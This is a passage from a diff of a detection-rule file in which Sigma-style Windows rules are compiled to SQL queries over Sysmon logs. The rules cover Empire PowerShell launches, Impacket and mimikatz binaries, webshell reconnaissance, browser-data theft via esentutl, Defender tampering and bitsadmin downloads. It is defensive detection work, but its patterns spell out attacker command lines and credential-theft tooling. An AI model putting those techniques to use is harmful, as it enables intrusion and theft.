"Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '% /dest:rdp-tcp:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('Cmd.Exe', 'PowerShell.EXE', 'pwsh.dll')) AND (ParentImage LIKE '%\\\\elevation\\_service.exe' ESCAPE '\\' AND IntegrityLevel = 'System'))" ], - "filename": "proc_creation_win_tscon_rdp_redirect.yml" + "filename": "proc_creation_win_exploit_cve_2021_41379.yml" }, { - "title": "PUA - NPS Tunneling Tool Execution", - "id": "68d37776-61db-42f5-bf54-27e87072d17e", + "title": "Esentutl Steals Browser Information", + "id": "6a69f62d-ce75-4b57-8dce-6351eb55b362", "status": "experimental", - "description": "Detects the use of NPS, a port forwarding and intranet penetration proxy server", - "author": "Florian Roth (Nextron Systems)", + "description": "One way Qbot steals sensitive information is by extracting browser data from Internet Explorer and Microsoft Edge by using the built-in utility esentutl.exe", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.collection", + "attack.t1005" ], "falsepositives": [ "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\npc.exe' ESCAPE '\\' OR (CommandLine LIKE '% -server=%' ESCAPE '\\' AND CommandLine LIKE '% -vkey=%' ESCAPE '\\' AND CommandLine LIKE '% -password=%' ESCAPE '\\') OR CommandLine LIKE '% -config=npc%' ESCAPE '\\' OR ((Hashes LIKE '%MD5=AE8ACF66BFE3A44148964048B826D005%' ESCAPE '\\' OR Hashes LIKE '%SHA1=CEA49E9B9B67F3A13AD0BE1C2655293EA3C18181%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=5A456283392FFCEEEACA3D3426C306EB470304637520D72FED1CC1FEBBBD6856%' ESCAPE '\\') OR md5 = 'ae8acf66bfe3a44148964048b826d005' OR sha1 = 'cea49e9b9b67f3a13ad0be1c2655293ea3c18181' OR sha256 = '5a456283392ffceeeaca3d3426c306eb470304637520d72fed1cc1febbbd6856')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR OriginalFileName = 'esentutl.exe') AND (CommandLine LIKE '%/r%' ESCAPE '\\' OR CommandLine LIKE '%-r%' ESCAPE '\\') AND CommandLine LIKE '%\\\\Windows\\\\WebCache%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_nps.yml" + "filename": "proc_creation_win_esentutl_webcache.yml" }, { - "title": "Suspicious Modification Of Scheduled Tasks", - "id": "1c0e41cd-21bb-4433-9acc-4a2cd6367b9b", + "title": "Script Event Consumer Spawning Process", + "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", "status": "experimental", - "description": "Detects when an attacker tries to modify an already existing scheduled tasks to run from a suspicious location\nAttackers can create a simple looking task in order to avoid detection on creation as it's often the most focused on\nInstead they modify the task after creation to include their malicious payload\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", + "author": "Sittikorn S", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1047" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /Change %' ESCAPE '\\' AND CommandLine LIKE '% /TN %' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE 
'\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\') AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%bash.exe%' ESCAPE '\\' OR CommandLine LIKE '%bash %' ESCAPE '\\' OR CommandLine LIKE '%scrcons%' ESCAPE '\\' OR CommandLine LIKE '%wmic %' ESCAPE '\\' OR CommandLine LIKE '%wmic.exe%' ESCAPE '\\' OR CommandLine LIKE '%forfiles%' ESCAPE '\\' OR CommandLine LIKE '%scriptrunner%' ESCAPE '\\' OR CommandLine LIKE '%hh.exe%' ESCAPE '\\' OR CommandLine LIKE '%hh %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' 
ESCAPE '\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR Image LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_change.yml" + "filename": "proc_creation_win_scrcons_susp_child_process.yml" }, { - "title": "Execution via stordiag.exe", - "id": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", + "title": "HackTool - Empire PowerShell Launch Parameters", + "id": "79f4ede3-402e-41c8-bc3e-ebbf5f162581", "status": "test", - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "author": "Austin Songer (@austinsonger)", + "description": "Detects suspicious powershell command line parameters used in Empire", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Legitimate usage of stordiag.exe." 
+ "Other tools that incidentally use the same command line parameters" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\stordiag.exe' ESCAPE '\\' AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\fltmc.exe' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'c:\\\\windows\\\\system32\\\\%' ESCAPE '\\' OR ParentImage LIKE 'c:\\\\windows\\\\syswow64\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -NoP -sta -NonI -W Hidden -Enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc %' ESCAPE '\\' OR CommandLine LIKE '% -NoP -NonI -W Hidden -enc %' ESCAPE '\\' OR CommandLine LIKE '% -noP -sta -w 1 -enc%' ESCAPE '\\' OR CommandLine LIKE '% -enc SQB%' ESCAPE '\\' OR CommandLine LIKE '% -nop -exec bypass -EncodedCommand %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_stordiag_susp_child_process.yml" + "filename": "proc_creation_win_hktl_empire_powershell_launch.yml" }, { - "title": "Gpg4Win Decrypt Files From Suspicious Locations", - "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "title": "Suspicious MsiExec Embedding Parent", + "id": "4a2a2c3e-209f-4d01-b513-4155a540b469", "status": "experimental", - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior", + "description": "Adversaries may abuse msiexec.exe to proxy the execution of malicious payloads", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1218.007", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\gpg2.exe' 
ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%MsiExec.exe%' ESCAPE '\\' AND ParentCommandLine LIKE '%-Embedding %' ESCAPE '\\') AND NOT ((Image LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%\\\\DismFoDInstall.cmd%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\MsiExec.exe -Embedding %' ESCAPE '\\' AND ParentCommandLine LIKE '%Global\\\\MSI0000%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_gpg4win_susp_usage.yml" + "filename": "proc_creation_win_msiexec_embedding.yml" }, { - "title": "Elise Backdoor Activity", - "id": "e507feb7-5f73-4ef6-a970-91bb6f6d744f", + "title": "HackTool - Impacket Tools Execution", + "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", "status": "test", - "description": "Detects Elise backdoor activity used by APT32", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.g0030", - "attack.g0050", - "attack.s0081", "attack.execution", - "attack.t1059.003" + "attack.t1557.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use of the impacket tools" ], - "level": 
"critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\Microsoft\\\\Network\\\\svchost.exe' ESCAPE '\\' OR (CommandLine LIKE '%\\\\Windows\\\\Caches\\\\NavShExt.dll%' ESCAPE '\\' AND CommandLine LIKE '%/c del%' ESCAPE '\\')) OR ((CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\MICROS~1\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Caches\\\\NavShExt.dll' ESCAPE '\\') AND CommandLine LIKE '%,Setting%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\goldenPac%' ESCAPE '\\' OR Image LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR Image LIKE '%\\\\kintercept%' ESCAPE '\\' OR Image LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\rpcdump%' ESCAPE '\\' OR Image LIKE '%\\\\samrdump%' ESCAPE '\\' OR Image LIKE '%\\\\secretsdump%' ESCAPE '\\' OR Image LIKE '%\\\\smbexec%' ESCAPE '\\' OR Image LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR Image LIKE '%\\\\wmiexec%' ESCAPE '\\' OR Image LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (Image LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\opdump\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR Image LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_malware_elise.yml" + "filename": "proc_creation_win_hktl_impacket_tools.yml" }, { - "title": "CMSTP UAC Bypass via COM Object Access", - "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", - "status": "stable", - "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", - "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", + "title": "Webshell Detection With Command Line Keywords", + "id": "bed2a484-9348-4143-8a8a-b801c979301c", + "status": "experimental", + "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System') AND (ParentCommandLine LIKE 
'% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentImage LIKE '%-tomcat-%' ESCAPE '\\' OR ParentImage LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentImage LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\quser.exe' ESCAPE '\\' OR Image LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR Image LIKE '%\\\\pathping.exe' ESCAPE '\\' OR Image LIKE '%\\\\tracert.exe' ESCAPE '\\' OR Image LIKE '%\\\\netstat.exe' ESCAPE 
'\\' OR Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" + "filename": "proc_creation_win_webshell_detection.yml" }, { - "title": "Rundll32 JS RunHTMLApplication Pattern", - "id": "9f06447a-a33a-4cbe-a94f-a3f43184a7a3", + "title": "Windows Defender Definition Files Removed", + "id": "9719a8aa-401c-41af-8108-ced7ec9cd75c", "status": "test", - "description": "Detects suspicious command line patterns used when rundll32 is used to run JavaScript code", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may disable security tools to avoid possible detection of their tools and activities by removing Windows Defender Definition Files", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%rundll32%' ESCAPE '\\' AND CommandLine LIKE '%javascript%' ESCAPE '\\' AND CommandLine LIKE '%..\\\\..\\\\mshtml,RunHTMLApplication%' ESCAPE '\\') OR CommandLine LIKE '%;document.write();GetObject(\"script%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MpCmdRun.exe' ESCAPE '\\' OR OriginalFileName = 'MpCmdRun.exe') AND (CommandLine LIKE '% -RemoveDefinitions%' ESCAPE '\\' AND CommandLine LIKE '% 
-All%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_rundll32_js_runhtmlapplication.yml" + "filename": "proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml" }, { - "title": "Suspicious Whoami.EXE Execution From Privileged Process", - "id": "79ce34ca-af29-4d0e-b832-fc1b377020db", - "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", - "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", + "title": "PUA - AdFind Suspicious Execution", + "id": "9a132afa-654e-11eb-ae93-0242ac130002", + "status": "test", + "description": "Detects AdFind execution with common flags seen used during attacks", + "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", "tags": [ - "attack.privilege_escalation", "attack.discovery", - "attack.t1033" + "attack.t1018", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.002" ], "falsepositives": [ - "Unknown" + "Legitimate admin activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'whoami.exe' OR Image LIKE '%\\\\whoami.exe' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\' OR User LIKE '%TrustedInstaller%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE 
'%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml" + "filename": "proc_creation_win_pua_adfind_susp_usage.yml" }, { - "title": "Renamed Mavinject.EXE Execution", - "id": "e6474a1b-5390-49cd-ab41-8d88655f7394", + "title": "Lolbin Ssh.exe Use As Proxy", + "id": "7d6d30b8-5b91-4b90-a891-46cccaf29598", "status": "experimental", - "description": "Detects the execution of a renamed version of the \"Mavinject\" process. Which can be abused to perform process injection using the \"/INJECTRUNNING\" flag", - "author": "frack113, Florian Roth", + "description": "Detect usage of the \"ssh.exe\" binary as a proxy to launch other programs", + "author": "frack113, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055.001", - "attack.t1218.013" + "attack.t1202" ], "falsepositives": [ - "Unlikely" + "Legitimate usage for administration purposes" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName IN ('mavinject32.exe', 'mavinject64.exe') AND NOT ((Image LIKE '%\\\\mavinject32.exe' ESCAPE '\\' OR Image LIKE '%\\\\mavinject64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\OpenSSH\\\\sshd.exe' ESCAPE '\\' OR (Image LIKE '%\\\\ssh.exe' ESCAPE '\\' AND (CommandLine LIKE '%ProxyCommand=%' ESCAPE '\\' OR (CommandLine LIKE '%PermitLocalCommand%' ESCAPE '\\' 
AND CommandLine LIKE '%LocalCommand%' ESCAPE '\\')))))" ], - "filename": "proc_creation_win_renamed_mavinject.yml" + "filename": "proc_creation_win_lolbin_ssh.yml" }, { - "title": "File Download Via Bitsadmin", - "id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", + "title": "LOLBIN From Abnormal Drive", + "id": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", "status": "test", - "description": "Detects usage of bitsadmin downloading a file", - "author": "Michael Haag, FPT.EagleEye", + "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti'", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.t1197", - "attack.s0190", - "attack.t1036.003" + "attack.defense_evasion" ], "falsepositives": [ - "Some legitimate apps use this, but limited." + "Rare false positives could occur on servers with multiple drives." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR ((CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\calc.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\installutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\cmstp.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'CALC.EXE', 'MSHTA.EXE', 'cscript.exe', 'wscript.exe', 'REGSVR32.EXE', 'installutil.exe', 'CMSTP.EXE')) AND NOT 
((CurrentDirectory LIKE '%C:\\\\%' ESCAPE '\\') OR (CurrentDirectory = '') OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_bitsadmin_download.yml" + "filename": "proc_creation_win_lolbin_not_from_c_drive.yml" }, { - "title": "Suspicious Call by Ordinal", - "id": "e79a9e79-eb72-4e78-a628-0e7e8f59e89c", - "status": "stable", - "description": "Detects suspicious calls of DLLs in rundll32.dll exports by ordinal", - "author": "Florian Roth (Nextron Systems)", + "title": "Port Forwarding Attempt Via SSH", + "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "status": "experimental", + "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218.011" + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1572", + "attack.t1021.001", + "attack.t1021.004" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment", - "Windows control panel elements have been identified as source (mmc)" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,#%' ESCAPE '\\' OR CommandLine LIKE '%, #%' ESCAPE '\\' OR CommandLine LIKE '%.dll #%' ESCAPE '\\' OR CommandLine LIKE 